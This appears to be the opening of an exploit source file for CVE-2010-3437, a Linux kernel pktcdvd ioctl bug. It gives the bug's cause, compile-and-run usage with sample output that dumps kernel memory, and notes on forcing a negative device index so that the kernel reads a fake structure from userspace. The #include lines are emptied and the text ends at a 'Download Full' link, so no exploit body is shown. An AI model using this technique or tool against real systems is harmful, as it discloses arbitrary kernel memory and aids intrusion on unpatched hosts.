/*
* cve-2010-3437.c |
* |
* Linux Kernel <> |
* Jon Oberheide |
* http://jon.oberheide.org |
* |
* Information: |
* |
* https://bugzilla.redhat.com/show_bug.cgi?id=638085 |
* |
* The PKT_CTRL_CMD_STATUS device ioctl retrieves a pointer to a |
* pktcdvd_device from the global pkt_devs array. The index into this |
* array is provided directly by the user and is a signed integer, so the |
* comparison to ensure that it falls within the bounds of this array will |
* fail when provided with a negative index. |
* |
* Usage: |
* |
* $ gcc cve-2010-3437.c -o cve-2010-3437 |
* $ ./cve-2010-3437 |
* usage: ./cve-2010-3437 |
* $ ./cve-2010-3437 0xc0102290 64 |
* [+] searching for pkt_devs kernel symbol... |
* [+] found pkt_devs at 0xc086fcc0 |
* [+] opening pktcdvd device... |
* [+] calculated dereference address of 0x790070c0 |
* [+] mapping page at 0x79007000 for pktcdvd_device dereference... |
* [+] setting up fake pktcdvd_device structure... |
* [+] dumping kmem from 0xc0102290 to 0xc01022d0 via malformed ioctls... |
* [+] dumping kmem to output... |
* |
* 55 89 e5 0f 1f 44 00 00 8b 48 3c 8b 50 04 8b ... |
* 55 89 e5 57 56 53 0f 1f 44 00 00 89 d3 89 e2 ... |
* |
* Notes: |
* |
* Pass the desired kernel memory address and dump length as arguments. |
* |
* We can disclose 4 bytes of arbitrary kernel memory per ioctl call by |
* specifying a large negative device index, causing the kernel to |
* dereference to our fake pktcdvd_device structure in userspace and copy |
* data to userspace from an attacker-controlled address. Since only 4 |
* bytes of kmem are disclosed per ioctl call, large dump sizes may take a |
* few seconds. |
* |
* Tested on Ubuntu Lucid 10.04. 32-bit only for now. |
*/ |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include |
#include
Download Full